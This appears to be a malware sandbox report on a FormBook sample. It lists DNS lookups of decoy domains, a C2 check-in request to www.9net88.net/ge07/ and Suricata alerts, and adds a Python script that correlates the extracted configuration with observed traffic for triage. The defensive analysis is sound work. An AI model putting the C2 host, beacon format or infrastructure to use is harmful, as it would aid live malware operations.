Source: unknown | DNS traffic detected: query: www.eloshost.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ithin-ksvodn.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ool-covers76.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ridesmaidgiftsboutiqueki.shop reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.lray-civil.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.g18q11a.top reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.elonix-traceglow.pro reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.rowadservepros.net reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.lasterdeals.shop reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.azl.pro reply code: Name error (3)
Source: global traffic | HTTP traffic detected: GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1 | Host: www.9net88.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.243.227
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49706
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49902
(Both 2022930 hits are on traffic arriving from TCP/443 at the sandbox host, a different flow from the FormBook check-in to 199.59.243.227:80 above; triage them separately from the C2 alerts rather than folding them into the FormBook verdict.)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004D25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004D25E2
Source: global traffic | HTTP traffic detected: GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1 | Host: www.9net88.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | DNS traffic detected: DNS query: www.9net88.net
Source: global traffic | DNS traffic detected: DNS query: www.lasterdeals.shop
Source: global traffic | DNS traffic detected: DNS query: www.eloshost.xyz
Source: global traffic | DNS traffic detected: DNS query: www.lray-civil.xyz
Source: global traffic | DNS traffic detected: DNS query: www.ool-covers76.xyz
Source: global traffic | DNS traffic detected: DNS query: www.azl.pro
Source: global traffic | DNS traffic detected: DNS query: www.ithin-ksvodn.xyz
Source: global traffic | DNS traffic detected: DNS query: www.g18q11a.top
Source: global traffic | DNS traffic detected: DNS query: www.rowadservepros.net
Source: global traffic | DNS traffic detected: DNS query: www.ridesmaidgiftsboutiqueki.shop
Source: global traffic | DNS traffic detected: DNS query: www.elonix-traceglow.pro
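The extractor output and the DNS and HTTP lines above fit together: one real C2 entry, a long decoy list that the sample queries as www.<decoy> with the same /ge07/ path (the explorer.exe strings further down show that form), and only the C2 name resolving. The following is an added example, not Joe Sandbox or extractor code, that correlates a FormBook configuration with observed DNS answers and the check-in request and reports what actually reached a live C2. Its decoy list is cut down to the entries used here, and the DNS answers and the request are reconstructed from the report lines rather than captured.

```python
"""Correlate an extracted FormBook configuration with observed DNS and HTTP.

Added example for this page, not Joe Sandbox or the extractor's code. The
configuration is the report's, with the decoy list cut to the entries this
example needs; DNS answers and the HTTP request are rebuilt from the report
lines, not captured live. One observation from the report is built in: decoy
entries are queried with a "www." prefix and the same path as the C2 entry.
"""
from __future__ import annotations

from urllib.parse import parse_qs, urlsplit

CONFIG = {
    "C2 list": ["www.9net88.net/ge07/"],
    "decoy": [
        "amyard.shop", "eloshost.xyz", "g18q11a.top", "ithin-ksvodn.xyz",
        "elonix-traceglow.pro", "lray-civil.xyz", "ool-covers76.xyz",
        "lasterdeals.shop", "azl.pro", "rowadservepros.net",
        "ridesmaidgiftsboutiqueki.shop",
    ],
}

# (query name, rcode) reconstructed from the report: ten decoys answered
# "Name error (3)" (NXDOMAIN); the C2 name resolved, since a connection and a
# GET to it follow.
DNS_EVENTS = [
    ("www.9net88.net", "NOERROR"),
    ("www.lasterdeals.shop", "NXDOMAIN"),
    ("www.eloshost.xyz", "NXDOMAIN"),
    ("www.lray-civil.xyz", "NXDOMAIN"),
    ("www.ool-covers76.xyz", "NXDOMAIN"),
    ("www.azl.pro", "NXDOMAIN"),
    ("www.ithin-ksvodn.xyz", "NXDOMAIN"),
    ("www.g18q11a.top", "NXDOMAIN"),
    ("www.rowadservepros.net", "NXDOMAIN"),
    ("www.ridesmaidgiftsboutiqueki.shop", "NXDOMAIN"),
    ("www.elonix-traceglow.pro", "NXDOMAIN"),
]

# The check-in request as printed in the report, headers rebuilt on CRLF.
RAW_REQUEST = (
    "GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE"
    "&uVuD=ApWHHF HTTP/1.1\r\n"
    "Host: www.9net88.net\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def c2_entries(config: dict) -> list[tuple[str, str]]:
    """Split each C2 entry "host/path/" into (host, "/path/")."""
    out = []
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((host.lower(), "/" + path))
    return out


def host_kinds(config: dict) -> dict[str, str]:
    """Every hostname the config can produce, labelled c2 or decoy."""
    kinds = {host: "c2" for host, _ in c2_entries(config)}
    for d in config["decoy"]:
        kinds.setdefault(d.lower(), "decoy")
        kinds.setdefault("www." + d.lower(), "decoy")  # form seen in the report
    return kinds


def classify_dns(config: dict, events) -> list[tuple[str, str, str]]:
    kinds = host_kinds(config)
    return [(name, kinds.get(name.lower(), "unrelated"), rcode) for name, rcode in events]


def parse_request(raw: str) -> dict:
    head, _, _ = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "host": headers.get("host", "").lower(),
            "path": parts.path, "params": parse_qs(parts.query, keep_blank_values=True)}


def match_c2(config: dict, req: dict) -> str | None:
    """The C2 entry a request hits (host and path both match), else None."""
    for host, path in c2_entries(config):
        if req["host"] == host and req["path"] == path:
            return f"{host}{path}"
    return None


def triage(config: dict, dns_events, raw_request: str) -> dict:
    labelled = classify_dns(config, dns_events)
    req = parse_request(raw_request)
    return {
        "c2_resolved": [n for n, k, r in labelled if k == "c2" and r == "NOERROR"],
        "decoy_nxdomain": sum(1 for _, k, r in labelled if k == "decoy" and r == "NXDOMAIN"),
        "decoy_resolved": [n for n, k, r in labelled if k == "decoy" and r == "NOERROR"],
        "unrelated": [n for n, k, _ in labelled if k == "unrelated"],
        "c2_request": match_c2(config, req),
        "request_params": sorted(req["params"]),
    }


if __name__ == "__main__":
    for key, value in triage(CONFIG, DNS_EVENTS, RAW_REQUEST).items():
        print(f"{key}: {value}")
```

When blocking on the output, note which side a name falls on: a resolving decoy is not evidence of C2 (it is whatever that registered domain happens to be), while the one entry under "C2 list" is the host that received the check-in and is the indicator worth acting on.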
Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000002.4486573997.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000000.2048246007.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2048278043.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2047748419.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.9net88.net
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.9net88.net/ge07/
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.9net88.net/ge07/www.lasterdeals.shop
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.9net88.netReferer:
Source: explorer.exe, 00000003.00000000.2052141439.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2052141439.000000000C860000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.azl.pro
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.azl.pro/ge07/
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.azl.pro/ge07/www.ithin-ksvodn.xyz
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.azl.proReferer:
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.elonix-traceglow.pro
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.elonix-traceglow.pro/ge07/
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.elonix-traceglow.pro/ge07/www.yegle.net
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.elonix-traceglow.proReferer:
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eloshost.xyz
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eloshost.xyz/ge07/
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eloshost.xyz/ge07/www.lray-civil.xyz
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eloshost.xyzReferer:
Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.topReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/www.ridesmaidgiftsboutiqueki.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/www.eloshost.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shopReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz/ge07/www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today/ge07/www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.todayReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/www.azl.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop/ge07/www.elonix-traceglow.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shopReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.netReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/www.ood-packaging-jobs-brasil.today
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.netReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyzReferer:
          Source: explorer.exe, 00000003.00000000.2051663367.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000002.4489526036.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4489526036.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.2422468972.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4488106924.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2045719239.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000002.4494090893.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095216810.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094383643.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000003.3094383643.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4494158240.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
